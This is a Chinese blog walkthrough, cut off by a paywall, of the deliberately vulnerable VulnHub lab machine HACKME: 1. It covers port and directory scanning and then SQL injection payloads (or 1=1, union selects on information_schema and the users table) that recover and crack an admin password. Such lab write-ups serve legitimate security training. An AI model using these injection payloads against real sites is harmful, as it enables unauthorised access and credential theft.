HACKME: 1实战演练

已于 2023-05-25 07:25:17 修改
阅读量149 收藏 1
点赞数
分类专栏: vulnhub 文章标签: 网络安全 vulnhub
于 2023-05-24 13:26:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/130844952
版权

文章目录

HACKME: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/hackme-1,330/

设备名称 IP地址
靶机:HACKME: 1 192.168.2.52
攻击机:kali 192.168.2.18
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.52

# 开放SSH:22端口,WEB:80端口
# SSH:22端口需要账号密码

在这里插入图片描述

2、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.2.52

在这里插入图片描述

3、访问网站
http://192.168.2.52/login.php

在这里插入图片描述

4、注册账号
http://192.168.2.52/register.php

# 用户名:kali	密码:123456

在这里插入图片描述

5、登录网站
http://192.168.2.52/login.php

在这里插入图片描述

6、搜索信息
http://192.168.2.52/welcome.php

在这里插入图片描述

三、Web漏洞攻击
1、SQL注入
# 验证是否存在SQL注入漏洞
OSCP' or 1=1#

在这里插入图片描述

# 显示回显位置
OSCP' union select 1,2,3#

在这里插入图片描述

# 显示数据库
OSCP' union select table_name,2,3 from information_schema.tables where
table_schema=database()#

在这里插入图片描述

# 显示字段名 
OSCP' union select column_name,2,3 from information_schema.columns where table_name='users'#

在这里插入图片描述

# 显示字段值
OSCP' union select user,pasword,3 from users#

在这里插入图片描述

2、解密

网站:https://pmd5.com/

# 账号:superadmin	密码:Uncrackable

在这里插入图片描述

3、登陆网站

最低0.47元/天 解锁文章
liebe1*1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6260
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme-1靶机渗透详解
大熊
06-12 471
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
hackme-1打靶记录
wwd180的博客
06-12 99
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
HACK ME靶机
qq_49101841的博客
10-01 1170
❀本篇关于信息安全实训时靶场训练的操作笔记。
攻防世界-hackme
qq_70851535的博客
11-19 309
逆向分析
FPGA设计实战演练(高级技巧篇)
11-16
一生中有幸成为新发现或新思想的一部分的机会屈指可数。某些思想或革新会极大地改变我们所生活的 世界。想一想如果生物科学家完成了整个人类基因的绘制 — 确定了DNA结构的最后一个基因,美国国 ...
Spring Boot实战演练Demo
09-06
《Spring Boot实战演练Demo》是基于Java开发框架Spring Boot的一次深入实践,旨在帮助开发者更好地理解和运用Spring Boot进行快速开发。这个Demo包含了丰富的代码示例和详细的解释,以辅助学习者通过实例掌握Spring ...
2014江西公务员面试备考:考前实战演练及解析五十九.doc
02-16
2014江西公务员面试备考:考前实战演练及解析五十九.doc
C#与.NET技术平台实战演练
12-02
C#与.NET技术平台实战演练
计算机视觉实战演练:算法与应用_思维导图1
08-03
实战演练深入探讨了计算机视觉的算法及其在实际中的应用,旨在帮助读者掌握核心概念并提升解决视觉问题的能力。 首先,【绪论篇】介绍了计算机视觉的基本概念,包括对计算机视觉的概述,它涉及利用计算机对图像...
hackme 靶场复现
m0_68471358的博客
08-02 283
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
VulnHub-hackme:1漏洞利用流程
2301_76786857的博客
06-13 228
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
Hackme靶机渗透
m0_50584370的博客
06-01 233
hackme靶机渗透
Hackme_1靶机渗透 (新手推荐)主要考点SQL注入,文件上传
m0_64429364的博客
09-19 274
hackme_1详细解释
【靶机渗透】HACKME: 1
安全狐
07-19 907
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
红队打靶练习:HACKME: 1
分享
12-18 440
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
Vulnhub--hackme1
weixin_45168704的博客
06-12 89
hackme1靶机渗透流程
靶场-hackeme1
weixin_58602402的博客
06-12 140
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
靶机渗透之hackme1
最新发布
weixin_64267091的博客
01-04 896
对于vulnhub中的靶机,我们都需先下载镜像,然后导入VM,并将改为NAT模式。首先我们再来看一下靶机渗透的步骤:信息收集-漏洞分析-漏洞利用-提权。基本都是这个三个步骤,接下来开始我们今天的靶机渗透吧!
Linux入门到精通:实战演练与C语言示例
本资源是一份针对Linux系统学习的实战演练参考答案,旨在帮助读者从入门阶段逐步提升技能。在《Linux从入门到精通》这本书中,作者将理论知识与实践操作紧密结合,通过一系列实战案例让学习者深入理解和掌握Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值